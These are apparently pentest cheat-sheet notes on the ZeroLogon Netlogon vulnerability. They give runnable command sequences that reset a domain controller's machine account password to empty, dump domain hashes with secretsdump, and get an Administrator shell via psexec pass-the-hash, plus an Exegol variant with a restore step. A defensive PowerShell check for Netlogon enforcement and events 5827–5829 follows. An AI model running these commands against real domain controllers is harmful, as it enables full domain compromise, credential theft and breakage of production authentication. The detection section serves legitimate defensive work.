ZeroLogon

# Exploit: reset the DC machine account password to empty (the DC stays broken until it is restored)
git clone https://github.com/risksense/zerologon/
cd zerologon

python3 set_empty_pw.py <netbios_dc_name> <dc_ip>

# secretsdump to retrieve a user hash
secretsdump -no-pass '<DOMAIN>/<DC_NAME>$@<DC_IP>'

# Get a shell with a user
psexec.py -hashes :<nt_hash> <DOMAIN>/Administrator@<DC_IP>

With Exegol, the vulnerability can be exploited more simply:

# Scan for the vulnerability
zerologon-scan 'DC_name' 'DC_IP_address'

# Exploit the vulnerability: set the NT hash to \x00*8
zerologon-exploit 'DC_name' 'DC_IP_address'

# Obtain the Domain Admin's NT hash
secretsdump -no-pass 'Domain'/'DC_computer_account$'@'Domain_controller'

# Obtain the machine account hex encoded password with the domain admin credentials
secretsdump -hashes :'NThash' 'Domain'/'Domain_admin'@'Domain_controller'

# Restore the machine account password
zerologon-restore 'Domain'/'DC_account'@'Domain_controller' -target-ip 'DC_IP_address' -hexpass 'DC_hexpass'
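As an added defensive check (not part of these notes, nor of the risksense or Exegol tooling), the following PowerShell verifies on a domain controller whether Netlogon secure channel enforcement is active and lists the Netlogon events that record denied or allowed vulnerable connections. It assumes it is run elevated on the DC; the registry value and event IDs are the ones Microsoft shipped with the ZeroLogon hardening updates.

```powershell
# Added example: defensive posture check for ZeroLogon on a domain controller.
# Assumes an elevated PowerShell session on the DC itself.

$key = 'HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters'
$enforce = (Get-ItemProperty -Path $key -Name FullSecureChannelProtection -ErrorAction SilentlyContinue).FullSecureChannelProtection

# FullSecureChannelProtection = 1 forces secure RPC for all machine and trust accounts.
# Note: from the February 2021 update onwards enforcement is on by default, so an absent
# value on a fully patched DC does not by itself mean the DC is vulnerable.
if ($enforce -eq 1) {
    Write-Output 'FullSecureChannelProtection = 1: vulnerable Netlogon connections are denied.'
} else {
    Write-Output 'FullSecureChannelProtection is not 1: confirm the DC is fully patched and enforcement is active.'
}

# Netlogon events in the System log added by the ZeroLogon updates:
#   5827 / 5828 - a vulnerable Netlogon secure channel connection was denied (machine / trust account)
#   5829        - a vulnerable connection was allowed because enforcement was not active
$events = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 5827, 5828, 5829 } -ErrorAction SilentlyContinue

if (-not $events) {
    Write-Output 'No Netlogon 5827/5828/5829 events found.'
}

foreach ($e in $events) {
    [PSCustomObject]@{
        Time    = $e.TimeCreated
        Id      = $e.Id
        Summary = ($e.Message -split "`n")[0]   # first line names the account and source
    }
}
```

A 5829 event after a 5827/5828-free window means a client still negotiated an insecure channel and was allowed; a burst of 5827 events from one source host during a short window is what the exploit above looks like on the DC side.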